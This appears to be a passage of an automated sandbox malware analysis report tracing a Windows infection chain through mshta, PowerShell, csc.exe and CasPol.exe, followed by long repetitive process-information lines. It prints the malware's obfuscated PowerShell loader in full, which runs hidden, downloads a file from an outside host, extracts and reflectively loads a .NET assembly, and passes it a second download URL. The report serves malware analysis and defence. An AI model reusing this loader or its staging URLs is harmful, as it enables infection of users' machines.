lbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_03100A35 pushfd ; iretd 1_2_03100A3A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0310416D push ebx; ret 1_2_031042DA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04885662 push eax; iretd 3_2_04885699
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04880ABD pushfd ; iretd 3_2_04880AC2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_048A0A25 pushfd ; iretd 8_2_048A0A2A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_047869F0 push esp; ret 10_2_04786E09
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04780DAD pushfd ; iretd 10_2_04780DB2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004567E0 push eax; ret 12_2_004567FE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00463EF3 push ds; retf 12_2_00463EEC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00455EAF push ecx; ret 12_2_00455EC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433FF6 push ecx; ret 12_2_00434009
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_04572806 push ecx; ret 12_2_04572819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000B146 push ecx; ret 12_2_1000B159
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1002343D push esi; ret 12_2_10023446
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044693D push ecx; ret 18_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044DB70 push eax; ret 18_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044DB70 push eax; ret 18_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00451D54 push eax; ret 18_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00451D34 push eax; ret 19_2_00451D41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00444E71 push ecx; ret 19_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00414060 push eax; ret 24_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00414060 push eax; ret 24_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00414039 push ecx; ret 24_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004164EB push 0000006Ah; retf 24_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00416553 push 0000006Ah; retf 24_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00416555 push 0000006Ah; retf 24_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
